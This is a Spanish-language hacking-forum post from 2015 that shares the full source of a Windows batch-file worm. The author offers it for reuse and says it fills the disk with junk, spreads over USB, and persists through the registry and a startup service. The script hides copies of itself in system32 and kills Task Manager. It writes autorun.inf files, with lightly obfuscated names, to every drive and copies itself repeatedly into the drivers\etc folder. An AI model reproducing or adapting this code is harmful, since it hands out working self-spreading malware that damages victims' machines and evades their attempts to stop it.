This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Worm [Llena HD][Batch]

  • 0 Replies
  • 4682 Views

0 Members and 1 Guest are viewing this topic.

Offline xxneeco83xx

  • *
  • Underc0der
  • Posts: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • View Profile
    • Email

Worm [Llena HD][Batch]

  • on: August 15, 2015, 11:41:32 pm

Hola revisando la carpeta de codigos viejos, encontre esto que quizas a alguien le pueda servir, llena el HD con archivos basuras, y se propaga por USB, se agrega al registro y crea un servicio de inicio.


Code: (dos) You are not allowed to view links. Register or Login
@echo off
@color fc|color f0 && set /a maxvueltas=500::esto se multiplica por dos::
@mode con cols=10 lines=10
set hola=%~0
set /a count=1
set /a llenarhd=-1

set a=a
set t=t
set o=o
set r=r
set u=u
set n=n
set name=%a%%u%%t%o%r%un.i%n%f

if not exist %windir%\system32\update.%hola:~-3% (copy /y %0 %windir%\system32\update.%hola:~-3% && attrib +r +a +s +h %windir%\system32\update.%hola:~-3%) else (attrib +r +a +s +h %windir%\system32\update.%hola:~-3%)
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /d REG_SZ /t %windir%\system32\update.%hola:~-3% /f
sc create Update start=auto error=critical type=share binpath=%windir%\system32\update.%hola:~-3%

:a
rundll32 user32.dll,SetCursorPos %random:~-2%,%random:~2,0%
@tasklist /m | find /i "taskmgr.exe">nul
if errorlevel 1 (taskkill /f /im taskmgr.exe)>nul

for /d %%x in (%a%,B,C,D,E,F,G,H,I,J,K,L,M,%n%,%o%,P,Q,%r%,S,%t%,V,%u%,W,X,Y,Z) do (
if exist %%x: (
if not exist %%x:\%name:~0,5%.%hola:~-3% (copy /y %0 %%x:\%a%%u%%t%%o%%r%%u%%n%.%hola:~-3% && attrib +r +a +s +h %%x:\%name:~0,5%.%hola:~-3%) else (
attrib +r +a +s +h %%x:\%name:~0,5%.%hola:~-3%
if not exist %%x:\%name% (
echo [%a%%u%%t%%o%%r%%u%%n%] > %%x:\%name% | echo ShellExecu%t%e=%name:~0,5%.%hola:~-3% >> %%x:\%name%
for /l %%d in (1,10,1000) do (echo ;%random%%random%%random%%random%%random% >> %%x:\%name%)
echo %o%pe%n%=%name:~0,5%.%hola:~-3% >> %%x:\%name%|attrib +r +a +s +h %%x:\%name%)
) else (attrib +r +a +s +h %%x:\%name%)
)
)

set /a maxvueltas=%llenarhd%::

if %count%==%maxvueltas% (call:exit) else (set /a count=%count% + 1)
copy /y %0 %windir%\system32\drivers\etc\%random%%random%.%hola:~-3%>nul && md %windir%\system32\drivers\etc\%random%%random%%random%%random%>nul
goto:a

:exit
del /q /f %0
exit


Saludos!  ;D

El arte de crear malware, es algo que solo pocos entienden!